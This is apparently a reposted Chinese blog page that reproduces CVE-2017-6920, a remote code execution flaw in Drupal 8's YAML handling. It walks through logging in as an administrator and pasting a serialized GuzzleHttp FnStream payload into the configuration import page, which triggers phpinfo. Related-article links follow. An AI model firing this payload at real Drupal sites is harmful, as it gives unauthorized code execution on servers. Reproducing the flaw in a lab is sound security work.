Drupal Core 8 PECL YAML 反序列化任意代碼執行漏洞(CVE-2017-6920
漏洞背景:
2017年6月21日,Drupal官方發佈了一個編號爲CVE-2017- 6920 的漏洞,影響爲Critical。這是Drupal Core的YAML解析器處理不當所致使的一個遠程代碼執行漏洞,影響8.x的Drupal Core。php
漏洞復現:
1.打開網頁先登陸一個管理員帳號。
2.訪問 http://你的ip:8080/admin/config/development/configuration/single/import
3.而後以下圖所示:第二個隨便填。
poc:!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"ide
4.而後執行最下面的import,會再出來個phpinto就表明成了。
相關文章
- 1. fastjson 1.2.24 反序列化致使任意命令執行漏洞
- 2. 任意代碼執行漏洞簡介
- 3. thinkphp任意代碼執行漏洞
- 4. 任意代碼執行漏洞
- 5. Jackson 反序列化遠程代碼執行漏洞復現
- 6. Node.js 反序列化漏洞遠程執行代碼(CVE-2017-5941)
- 7. CVE-2017-6920 Drupal遠程代碼執行漏洞學習
- 8. fastjson 1.2.24反序列化致使任意命令執行漏洞分析記錄
- 9. fastjson 1.2.24反序列化導致任意命令執行漏洞分析記錄
- 10. Struts2/WebWork高危漏洞(遠程執行任意代碼)
- 更多相關文章...
- • Markdown 代碼 - Markdown 教程
- • Eclipse 代碼模板 - Eclipse 教程
- • IntelliJ IDEA代碼格式化設置
- • IntelliJ IDEA安裝代碼格式化插件
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章